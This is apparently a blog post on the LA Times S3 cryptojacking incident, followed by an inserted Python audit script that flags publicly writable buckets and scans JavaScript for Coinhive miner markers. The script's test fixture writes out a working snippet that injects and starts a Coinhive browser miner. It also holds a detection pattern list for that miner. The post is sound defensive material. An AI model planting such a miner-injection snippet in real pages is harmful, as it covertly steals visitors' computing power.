
Cryptojackers Claim Another Victim: How to Stay Safe

Cryptojackers love the cloud because of its processing power: they can mine cryptocurrency on someone else's hardware without paying for any of it. Just last week it was discovered that Tesla and hundreds of other companies had been infiltrated by cryptojackers. The LA Times is the latest company to deal with such an attack.

I recently wrote an article about this, but the different method used this time deserves elaboration. This motivation for hacking isn't going to dwindle anytime soon: crypto mining is king for many attackers because it makes money with little effort. Their method revolves around infiltrating poorly secured cloud platforms. Last week it was Tesla's container administration platform; this time it was the LA Times' Amazon S3 bucket.

How it happened

Fortunately for the LA Times, this attack wasn't as effective as the one on Tesla. Instead of taking over cloud compute, the attackers injected a Coinhive Monero miner into an interactive map served from the LA Times site, so the mining ran in the browsers of visitors rather than on LA Times infrastructure. Because the bucket was open, someone had even left a message warning that the S3 bucket was set up improperly (the LA Times didn't see this message). The bucket had been left with public write permissions turned on, which meant anyone on the internet could modify the files it served. This attack was far simpler to execute than Tesla's, and it was also easier to notice.

Solutions

This attack and Tesla's were obviously preventable: Tesla should have put a password on its container administration platform, and the LA Times shouldn't have allowed public write permissions on its S3 bucket. So, was this an oversight by a single employee, or by an entire group?

No matter who was to blame, proper cloud security automation tools would have caught this misconfiguration before it was exploited. This Coinhive miner was recently used to attack thousands of websites. Coinhive terminated the account used for the attacks, but the precedent is what's important: a more cohesive and skilled cryptojacker could run their own mining software, which no vendor can switch off, and execute far bigger attacks than this.

If an outsider was able to recognize that the bucket was open but the IT team was not, then it's clear that the LA Times needs an automated tool to monitor the permissions on its S3 buckets. This attack didn't do much damage, since it only stole CPU time from visitors, but the precedent is there. Enterprises using the cloud need to be more rigorous in both their practices and their tooling.
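The misconfiguration described in "How it happened" and the automated check called for above come together in the following example. It is added here and is not the author's code or anything the LA Times ran. It audits a bucket's ACL and bucket policy for public write access and scans served JavaScript for the Coinhive loader; the ACL, policy and JavaScript samples are constructed for illustration, and in real use they would come from boto3's get_bucket_acl, get_bucket_policy and get_object calls, as noted in the comments.

```python
"""Audit an S3 bucket for public write access and scan its JavaScript for an
injected Coinhive miner.

Added example, not the author's code. The ACL, policy and JavaScript samples
below are constructed; in real use they would come from
boto3.client("s3").get_bucket_acl(Bucket=b), .get_bucket_policy(Bucket=b)
(the "Policy" field, JSON-decoded) and .get_object(Bucket=b, Key=k)["Body"].read()."""
import re
from fnmatch import fnmatch

# Grantee URIs AWS uses for "everyone" and "any AWS account".
PUBLIC_GRANTEES = {
    "http://acs.amazonaws.com/groups/global/AllUsers": "AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers": "AuthenticatedUsers",
}
# ACL permissions that let the grantee add/replace objects or change access.
WRITE_PERMISSIONS = {"WRITE", "WRITE_ACP", "FULL_CONTROL"}
# IAM actions that write objects or loosen access; order is kept in findings.
WRITE_ACTIONS = ["s3:PutObject", "s3:PutObjectAcl", "s3:PutBucketAcl",
                 "s3:PutBucketPolicy", "s3:DeleteObject"]
# How the Coinhive browser miner was typically embedded in a page.
MINER_PATTERNS = [r"coinhive\.min\.js", r"CoinHive\.Anonymous", r"coin-?hive\.com"]


def _as_list(value):
    return value if isinstance(value, list) else [value]


def acl_public_write(acl):
    """Findings for every ACL grant that gives a public group write access."""
    findings = []
    for grant in acl.get("Grants", []):
        group = PUBLIC_GRANTEES.get(grant.get("Grantee", {}).get("URI"))
        if group and grant.get("Permission") in WRITE_PERMISSIONS:
            findings.append(f"ACL grants {grant['Permission']} to {group}")
    return findings


def _principal_is_public(principal):
    if principal == "*":
        return True
    return isinstance(principal, dict) and "*" in _as_list(principal.get("AWS", []))


def policy_public_write(policy):
    """Findings for Allow statements that let any principal write.

    Only Allow statements are inspected; a Deny elsewhere would override them,
    so a finding means "review this", not "certainly exploitable"."""
    findings = []
    for stmt in _as_list(policy.get("Statement", [])):
        if stmt.get("Effect") != "Allow" or not _principal_is_public(stmt.get("Principal")):
            continue
        # IAM action names are case-insensitive and support "*" wildcards.
        patterns = [p.lower() for p in _as_list(stmt.get("Action", []))]
        hits = [a for a in WRITE_ACTIONS if any(fnmatch(a.lower(), p) for p in patterns)]
        if hits:
            findings.append(f"policy statement {stmt.get('Sid', '<no Sid>')} "
                            f"allows {', '.join(hits)} to everyone")
    return findings


def find_miner_markers(js_text):
    """Return the substrings of js_text that look like a Coinhive loader."""
    hits = []
    for pattern in MINER_PATTERNS:
        m = re.search(pattern, js_text, re.IGNORECASE)
        if m:
            hits.append(m.group(0))
    return hits


def audit_bucket(acl, policy=None, objects=None):
    """Run all checks; objects maps object key -> text of a JavaScript file."""
    findings = acl_public_write(acl)
    if policy:
        findings += policy_public_write(policy)
    for key, text in (objects or {}).items():
        markers = find_miner_markers(text)
        if markers:
            findings.append(f"{key} contains miner markers: {', '.join(markers)}")
    return findings


# --- Constructed samples (not real LA Times data) ---
ALL_USERS = "http://acs.amazonaws.com/groups/global/AllUsers"
MISCONFIGURED_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner-id"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "READ"},
    {"Grantee": {"Type": "Group", "URI": ALL_USERS}, "Permission": "WRITE"},
]}
# Public READ is what a static-website bucket needs; the WRITE grant is the bug.
FIXED_ACL = {"Grants": MISCONFIGURED_ACL["Grants"][:2]}

MISCONFIGURED_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::example-map-bucket/*"},
    {"Sid": "Oops", "Effect": "Allow", "Principal": {"AWS": "*"},
     "Action": "s3:Put*", "Resource": "arn:aws:s3:::example-map-bucket/*"},
]}
FIXED_POLICY = {"Version": "2012-10-17", "Statement": MISCONFIGURED_POLICY["Statement"][:1]}

INJECTED_JS = (
    "function drawMap(){/* map code */}\n"
    "var s=document.createElement('script');"
    "s.src='https://coinhive.com/lib/coinhive.min.js';document.head.appendChild(s);\n"
    "s.onload=function(){new CoinHive.Anonymous('SITEKEY',{throttle:0.2}).start();};\n"
)
CLEAN_JS = "function drawMap(){/* map code */}\n"

if __name__ == "__main__":
    for f in audit_bucket(MISCONFIGURED_ACL, MISCONFIGURED_POLICY, {"map.js": INJECTED_JS}):
        print("FINDING:", f)
    print("fixed bucket:", audit_bucket(FIXED_ACL, FIXED_POLICY, {"map.js": CLEAN_JS}))
```

The ACL and policy checks are the part a scheduled job should run across every bucket in the account; the marker scan is what you run once a bucket has been found writable, to see whether anything was already planted. Beyond removing the WRITE grant, the durable fix is to turn on S3 Block Public Access for the account (boto3's put_public_access_block with all four flags set), which blocks new public ACLs and policies regardless of what an individual employee later configures.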

Additional resources

Check out my recent article, which contains more detail about the Tesla attack and goes into simple methods to enhance security. Here's an excerpt:

“These attacks can go on for months at a time without anyone noticing. Enterprises are apparently overlooking the importance of monitoring. The biggest flaw in DevOps is the lack of built-in security. Faster development and release schedules are great, but not if you don’t notice (or care about) major vulnerabilities (like having no password).”